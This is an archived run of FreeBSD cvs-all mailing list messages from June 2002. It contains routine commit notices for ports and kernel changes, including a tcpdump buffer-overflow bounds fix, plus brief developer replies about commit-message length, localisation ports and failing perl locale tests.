(PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDftJ41684; Mon, 17 Jun 2002 06:41:55 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206171341.g5HDftJ41684@freefall.freebsd.org> From: Sheldon Hearn Date: Mon, 17 Jun 2002 06:41:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/dsniff Makefile pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/17 06:41:55 PDT Modified files: security/dsniff Makefile pkg-plist Log: Add WITHOUT_X11 knob. If specified, webspy(8) will not be installed, and the X11 libraries are not required. Approved by: maintainer Revision Changes Path 1.11 +11 -3 ports/security/dsniff/Makefile 1.7 +1 -1 ports/security/dsniff/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:42:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C991D37B42F; Mon, 17 Jun 2002 06:42:09 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDg9G41762; Mon, 17 Jun 2002 06:42:09 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206171342.g5HDg9G41762@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Mon, 17 Jun 2002 06:42:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/comms/ltmdm Makefile ports/comms/ltmdm/files current-fix X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/17 06:42:09 PDT Modified files: comms/ltmdm Makefile Added files: comms/ltmdm/files current-fix Log: Fix building on -current Approved by: maintainer Revision Changes Path 1.5 +8 -1 ports/comms/ltmdm/Makefile 1.1 +88 -0 ports/comms/ltmdm/files/current-fix (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:43:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2C2637B419; Mon, 17 Jun 2002 06:43:15 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDhFC41937; Mon, 17 Jun 2002 06:43:15 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171343.g5HDhFC41937@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 06:43:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make make.1 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 06:43:15 PDT Modified files: usr.bin/make make.1 Log: make(I) appeared in PWB UNIX. Revision Changes Path 1.56 +1 -2 src/usr.bin/make/make.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:58: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5AA0737B41A; Mon, 17 Jun 2002 06:58:04 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDw4U43417; Mon, 17 Jun 2002 06:58:04 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171358.g5HDw4U43417@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 06:58:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/gtgt Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 06:58:04 PDT Modified files: devel/gtgt Makefile distinfo Log: upgrade to 1.3.2 Revision Changes Path 1.5 +1 -1 ports/devel/gtgt/Makefile 1.5 +1 -1 ports/devel/gtgt/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 7:24:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C914937B404; Mon, 17 Jun 2002 07:24:25 -0700 (PDT) Received: (from sf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HEOP150366; Mon, 17 Jun 2002 07:24:25 -0700 (PDT) (envelope-from sf) Message-Id: <200206171424.g5HEOP150366@freefall.freebsd.org> From: FUJISHIMA Satsuki Date: Mon, 17 Jun 2002 07:24:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/wget Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sf 2002/06/17 07:24:25 PDT Modified files: ftp/wget Makefile distinfo pkg-plist Log: update to 1.8.2. workaround build problem on -CURRENT. Revision Changes Path 1.52 +4 -15 ports/ftp/wget/Makefile 1.17 +1 -2 ports/ftp/wget/distinfo 1.13 +2 -0 ports/ftp/wget/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 7:31: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id 76C0037B422; Mon, 17 Jun 2002 07:30:57 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5HEUki9023637 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Mon, 17 Jun 2002 10:30:49 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Martin Blapp , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT modules Date: Mon, 17 Jun 2002 10:30:24 -0400 X-Mailer: KMail [version 1.4] References: <200206150006.g5F06Pn93057@freefall.freebsd.org> In-Reply-To: <200206150006.g5F06Pn93057@freefall.freebsd.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206171030.24290.mi+mx@aldan.algebra.com> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Friday 14 June 2002 08:06 pm, Martin Blapp wrote: = mbr 2002/06/14 17:06:25 PDT = = Modified files: = . modules = Log: = openoffice-es --> ports/editors/openoffice-es Ooff, here it happens again. Not to snipe at this particular internationalization effort, but did not we want to have something more elegant? Like, say, openoffice-i18n with a dialog-based menu, where one can select any/all localizations desired? Kind of like kde-i18n, but without the redundant per-language slave ports? -mi -- ëÁË, ÷Ù ÒÁÚ×Å ÂÅÚ ÛÐÁÇÉ ÐÒÉÛÌÉ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 7:32:10 2002 Delivered-To: cvs-all@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 5149537B410; Mon, 17 Jun 2002 07:31:58 -0700 (PDT) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.36 #1) id 17JxYS-000Bf5-00; Mon, 17 Jun 2002 16:32:28 +0200 From: Sheldon Hearn To: Will Andrews Cc: Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Verbose commit messages (Re: cvs commit: ports/deskutils/kdepim3 Makefile distinfo pkg-plist ports/deskutils/kdepim3/files patch-icallangbind.c patch-parseholiday.y patch-vcc.y patch-vobject.c patch-y_tab.c ports/audio/arts Makefile distinfo ports/audio/kdemultimedia3 Makefile distinfo ...) In-reply-to: Your message of "Sat, 15 Jun 2002 18:57:06 EST." <20020615235706.GE53809@squall.waterspout.com> Date: Mon, 17 Jun 2002 16:32:28 +0200 Message-ID: <44830.1024324348@axl.seasidesoftware.co.za> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 15 Jun 2002 18:57:06 EST, Will Andrews wrote: > > Informative commit messages can be great, but please try and remember > > the repo bloat when you write long commit messages for commits which > > touch large numbers of files. > > > > This single commit added close to a megabyte to the ports repo. > > You're right. It takes too long to commit the update with the > individual ports, since there are usually hundreds of files > updated in each upgrade, not to mention that doing them > individually loses atomicity. So perhaps what I'll do next time > is just keep the first line and point to a changelog on a website. > And perhaps follow up to the commit message with the contents of > that changelog. I really like seeing this detail in CVS, but Kris has a point. Maybe you could use a one-liner for "all the files", including "see revision history for x11/kde for more detauls", and then the long message in a follow-up commit to x11/kde (or whatever the big daddy port for this is)? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 7:33:54 2002 Delivered-To: cvs-all@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id D569E37B413; Mon, 17 Jun 2002 07:33:49 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 4643055; Mon, 17 Jun 2002 09:33:49 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5HEXnJI096263; Mon, 17 Jun 2002 09:33:49 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5HEXgIf096262; Mon, 17 Jun 2002 09:33:42 -0500 (CDT) Date: Mon, 17 Jun 2002 09:33:42 -0500 From: "Jacques A. Vidrine" To: Sheldon Hearn Cc: Will Andrews , Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: Verbose commit messages (Re: cvs commit: ports/deskutils/kdepim3 Makefile distinfo pkg-plist ports/deskutils/kdepim3/files patch-icallangbind.c patch-parseholiday.y patch-vcc.y patch-vobject.c patch-y_tab.c ports/audio/arts Makefile distinfo ports/audio/kdemultimedia3 Makefile distinfo ...) Message-ID: <20020617143342.GB96248@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Sheldon Hearn , Will Andrews , Kris Kennaway , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <20020615235706.GE53809@squall.waterspout.com> <44830.1024324348@axl.seasidesoftware.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <44830.1024324348@axl.seasidesoftware.co.za> User-Agent: Mutt/1.3.99i X-Url: http://www.nectar.cc/ Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 17, 2002 at 04:32:28PM +0200, Sheldon Hearn wrote: > Maybe you could use a one-liner for "all the files", including "see > revision history for x11/kde for more detauls", and then the long > message in a follow-up commit to x11/kde (or whatever the big daddy port > for this is)? I like it. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 7:57:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BBE3737B436; Mon, 17 Jun 2002 07:57:15 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HEvFC53856; Mon, 17 Jun 2002 07:57:15 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206171457.g5HEvFC53856@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Mon, 17 Jun 2002 07:57:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile distinfo ports/net/samba/files patch-aa patch-ba patch-examples-VFS-Makefile patch-examples-VFS-recycle.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/17 07:57:15 PDT Modified files: net/samba Makefile distinfo net/samba/files patch-aa patch-ba Removed files: net/samba/files patch-examples-VFS-Makefile patch-examples-VFS-recycle.c Log: Update to 2.2.5 pre 1 Pretty soon 2.2.5 will be released and 2_2 will go into maintenance mode Revision Changes Path 1.87 +6 -9 ports/net/samba/Makefile 1.37 +1 -1 ports/net/samba/distinfo 1.18 +0 -9 ports/net/samba/files/patch-aa 1.7 +0 -43 ports/net/samba/files/patch-ba 1.2 +0 -14 ports/net/samba/files/patch-examples-VFS-Makefile (dead) 1.2 +0 -37 ports/net/samba/files/patch-examples-VFS-recycle.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8: 5:47 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id 43A7F37B404; Mon, 17 Jun 2002 08:05:42 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5HF5ci9023952 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Mon, 17 Jun 2002 11:05:40 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Will Andrews , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/deskutils/kdepim3 Makefile distinfo pkg-plist ports/deskutils/kdepim3/files patch-icallangbind.c patch-parseholiday.y patch-vcc.y patch-vobject.c patch-y_tab.c ports/audio/arts Makefile distinfo ports/audio/kdemultimedia3 Makefile distinfo ... Date: Mon, 17 Jun 2002 11:05:16 -0400 X-Mailer: KMail [version 1.4] References: <200206151616.g5FGGWZ19372@freefall.freebsd.org> In-Reply-To: <200206151616.g5FGGWZ19372@freefall.freebsd.org> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206171105.16149.mi+mx@aldan.algebra.com> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Saturday 15 June 2002 12:16 pm, Will Andrews wrote: = Log: = Upgrade to KDE 3.0.1. The delay in this upgrade is mainly due to the = rigorous testing performed on the part of the KDE/FreeBSD Project = over the last three weeks. Thanks to everyone who helped test! What a huge leap! = graphics/kdegraphics3: = [13] Turn off kuickshow by default because it depends on imlib, = which in turn depends on gtk/glib. This will be revisited = when we split up the KDE ports a bit. According to the opinions expressed on kde@FreeBSD.org, imlib does not require gtk, but the imlib port does -- for some reason. The fresh ports/39390 (by Jeremy Norris) is intended to fix the bug... -mi -- ëÁË, ÷Ù ÒÁÚ×Å ÂÅÚ ÛÐÁÇÉ ÐÒÉÛÌÉ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:11:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CDFCD37B431; Mon, 17 Jun 2002 08:11:08 -0700 (PDT) Received: (from jhay@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFB8k59615; Mon, 17 Jun 2002 08:11:08 -0700 (PDT) (envelope-from jhay) Message-Id: <200206171511.g5HFB8k59615@freefall.freebsd.org> From: John Hay Date: Mon, 17 Jun 2002 08:11:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files files.i386 files.pc98 src/sys/dev/ar if_ar.c if_ar.h if_ar_isa.c if_ar_pci.c if_arregs.h src/sys/dev/ic hd64570.h src/sys/dev/sr if_sr.c if_sr.h if_sr_isa.c if_sr_pci.c if_srregs.h src/sys/i386/isa if_ar.c ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/17 08:11:07 PDT Modified files: (Branch: RELENG_4) sys/conf files files.i386 files.pc98 sys/modules Makefile sys/modules/netgraph Makefile Added files: (Branch: RELENG_4) sys/dev/ar if_ar.c if_ar.h if_ar_isa.c if_ar_pci.c if_arregs.h sys/dev/ic hd64570.h sys/dev/sr if_sr.c if_sr.h if_sr_isa.c if_sr_pci.c if_srregs.h sys/modules/ar Makefile sys/modules/netgraph/sync_ar Makefile sys/modules/netgraph/sync_sr Makefile sys/modules/sr Makefile Removed files: (Branch: RELENG_4) sys/i386/isa if_ar.c if_ar.h if_arregs.h if_sr.c if_sr.h if_srregs.h sys/pci if_ar_p.c if_sr_p.c Log: MFC: Move the ar(4) and sr(4) drivers to sys/dev and make modules out of them. Revision Changes Path 1.340.2.104 +2 -1 src/sys/conf/files 1.307.2.30 +1 -1 src/sys/conf/files.i386 1.140.2.36 +1 -0 src/sys/conf/files.pc98 1.52.2.1 +2339 -0 src/sys/dev/ar/if_ar.c (new) 1.3.2.1 +51 -0 src/sys/dev/ar/if_ar.h (new) 1.49.2.1 +239 -0 src/sys/dev/ar/if_ar_isa.c (new) 1.6.2.1 +170 -0 src/sys/dev/ar/if_ar_pci.c (new) 1.7.2.1 +227 -0 src/sys/dev/ar/if_arregs.h (new) 1.6.4.1 +372 -0 src/sys/dev/ic/hd64570.h (new) 1.48.2.1 +2980 -0 src/sys/dev/sr/if_sr.c (new) 1.3.2.1 +51 -0 src/sys/dev/sr/if_sr.h (new) 1.46.2.1 +440 -0 src/sys/dev/sr/if_sr_isa.c (new) 1.15.2.1 +248 -0 src/sys/dev/sr/if_sr_pci.c (new) 1.6.2.1 +199 -0 src/sys/dev/sr/if_srregs.h (new) 1.37.2.1 +0 -2390 src/sys/i386/isa/if_ar.c (dead) 1.2.2.2 +0 -51 src/sys/i386/isa/if_ar.h (dead) 1.6.2.1 +0 -170 src/sys/i386/isa/if_arregs.h (dead) 1.34.2.3 +0 -3337 src/sys/i386/isa/if_sr.c (dead) 1.2.2.2 +0 -51 src/sys/i386/isa/if_sr.h (dead) 1.5.2.1 +0 -123 src/sys/i386/isa/if_srregs.h (dead) 1.110.2.52 +2 -0 src/sys/modules/Makefile 1.3.2.1 +8 -0 src/sys/modules/ar/Makefile (new) 1.8.2.7 +2 -0 src/sys/modules/netgraph/Makefile 1.2.2.1 +11 -0 src/sys/modules/netgraph/sync_ar/Makefile (new) 1.1.2.1 +11 -0 src/sys/modules/netgraph/sync_sr/Makefile (new) 1.2.2.1 +8 -0 src/sys/modules/sr/Makefile (new) 1.1.2.1 +0 -117 src/sys/pci/if_ar_p.c (dead) 1.11.2.1 +0 -129 src/sys/pci/if_sr_p.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:15:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 590C837B410; Mon, 17 Jun 2002 08:15:05 -0700 (PDT) Received: (from sf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFF5S60226; Mon, 17 Jun 2002 08:15:05 -0700 (PDT) (envelope-from sf) Message-Id: <200206171515.g5HFF5S60226@freefall.freebsd.org> From: FUJISHIMA Satsuki Date: Mon, 17 Jun 2002 08:15:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/japanese/navi2ch-emacs20 Makefile distinfo pkg-message pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sf 2002/06/17 08:15:05 PDT Modified files: japanese/navi2ch-emacs20 Makefile distinfo pkg-plist Removed files: japanese/navi2ch-emacs20 pkg-message Log: update to 1.5.2. Revision Changes Path 1.36 +1 -2 ports/japanese/navi2ch-emacs20/Makefile 1.26 +1 -1 ports/japanese/navi2ch-emacs20/distinfo 1.3 +0 -17 ports/japanese/navi2ch-emacs20/pkg-message (dead) 1.9 +11 -0 ports/japanese/navi2ch-emacs20/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:26:22 2002 Delivered-To: cvs-all@freebsd.org Received: from corbulon.video-collage.com (corbulon.video-collage.com [64.35.99.179]) by hub.freebsd.org (Postfix) with ESMTP id E61B337B412; Mon, 17 Jun 2002 08:26:16 -0700 (PDT) Received: from misha (250-217.customer.cloud9.net [168.100.250.217]) by corbulon.video-collage.com (8.12.2/8.12.2) with ESMTP id g5HFPFi9032615 (version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=FAIL); Mon, 17 Jun 2002 11:25:15 -0400 (EDT) (envelope-from mi+mx@aldan.algebra.com) X-Authentication-Warning: corbulon.video-collage.com: Host 250-217.customer.cloud9.net [168.100.250.217] claimed to be misha Content-Type: text/plain; charset="koi8-u" From: Mikhail Teterin Organization: Virtual Estates, Inc. To: Anton Berezin , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/lang/perl5 Makefile pkg-plist ports/lang/perl5/files patch-Install.pm use.perl Date: Mon, 17 Jun 2002 11:24:53 -0400 X-Mailer: KMail [version 1.4] References: <200206161228.g5GCS2543085@freefall.freebsd.org> In-Reply-To: <200206161228.g5GCS2543085@freefall.freebsd.org> Cc: dan@dan.emsphone.com MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206171124.53347.mi+mx@aldan.algebra.com> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sunday 16 June 2002 08:28 am, Anton Berezin wrote: = tobez 2002/06/16 05:28:02 PDT = = Modified files: = lang/perl5 Makefile pkg-plist = lang/perl5/files use.perl = Added files: = lang/perl5/files patch-Install.pm = Log: A ``make test'' in the ${WKRSRC} will fail for in a few locale-related tests. Anybody cares? -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:27:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 23B5137B442; Mon, 17 Jun 2002 08:27:38 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFQu061743; Mon, 17 Jun 2002 08:26:56 -0700 (PDT) (envelope-from fenner) Message-Id: <200206171526.g5HFQu061743@freefall.freebsd.org> From: Bill Fenner Date: Mon, 17 Jun 2002 08:26:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/tcpdump interface.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/17 08:26:56 PDT Modified files: contrib/tcpdump interface.h Log: In TTEST2(), check to make sure the "l" argument isn't so large that "snapend - l" underflows; this fixes a buffer overflow with malformed NFS packets, and may fix other buffer overflows with malformed packets. Obtained from: tcpdump.org CVS Revision Changes Path 1.6 +11 -3 src/contrib/tcpdump/interface.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:29:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2500037B405; Mon, 17 Jun 2002 08:29:43 -0700 (PDT) Received: (from bde@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HFSxS61922; Mon, 17 Jun 2002 08:28:59 -0700 (PDT) (envelope-from bde) Message-Id: <200206171528.g5HFSxS61922@freefall.freebsd.org> From: Bruce Evans Date: Mon, 17 Jun 2002 08:28:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/msun/src e_pow.c e_powf.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bde 2002/06/17 08:28:59 PDT Modified files: lib/msun/src e_pow.c e_powf.c Log: e_pow.c: Fixed pow(x, y) when x is very close to -1.0 and y is a very large odd integer. E.g., pow(-1.0 - pow(2.0, -52.0), 1.0 + pow(2.0, 52.0)) was 0.0 instead of being very close to -exp(1.0). PR: 39236 Submitted by: Stephen L Moshier e_powf.c: Apply the same patch although it is just cosmetic because odd integers large enough to cause the problem are too large to be precisely represented as floats. MFC after: 1 week Revision Changes Path 1.9 +1 -1 src/lib/msun/src/e_pow.c 1.9 +1 -1 src/lib/msun/src/e_powf.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 8:33:38 2002 Delivered-To: cvs-all@freebsd.org Received: from heechee.tobez.org (254.adsl0.ryv.worldonline.dk [213.237.10.254]) by hub.freebsd.org (Postfix) with ESMTP id 54FE537B40D; Mon, 17 Jun 2002 08:33:34 -0700 (PDT) Received: by heechee.tobez.org (Postfix, from userid 1001) id 53535AC04; Mon, 17 Jun 2002 17:30:33 +0200 (CEST) Date: Mon, 17 Jun 2002 17:30:33 +0200 From: Anton Berezin To: Mikhail Teterin Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, dan@dan.emsphone.com Subject: Re: cvs commit: ports/lang/perl5 Makefile pkg-plist ports/lang/perl5/files patch-Install.pm use.perl Message-ID: <20020617153033.GA80500@heechee.tobez.org> References: <200206161228.g5GCS2543085@freefall.freebsd.org> <200206171124.53347.mi+mx@aldan.algebra.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206171124.53347.mi+mx@aldan.algebra.com> User-Agent: Mutt/1.3.24i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 17, 2002 at 11:24:53AM -0400, Mikhail Teterin wrote: > On Sunday 16 June 2002 08:28 am, Anton Berezin wrote: > = tobez 2002/06/16 05:28:02 PDT > = > = Modified files: > = lang/perl5 Makefile pkg-plist > = lang/perl5/files use.perl > = Added files: > = lang/perl5/files patch-Install.pm > = Log: > > A ``make test'' in the ${WKRSRC} will fail for in a few locale-related > tests. Anybody cares? Definitely. See PR 34308. I'd appreciate if people cared to investigate first, though. Cheers, =Anton. -- | Anton Berezin | FreeBSD: The power to serve | | catpipe Systems ApS _ _ |_ | http://www.FreeBSD.org | | tobez@catpipe.net (_(_|| | tobez@FreeBSD.org | | +45 7021 0050 | 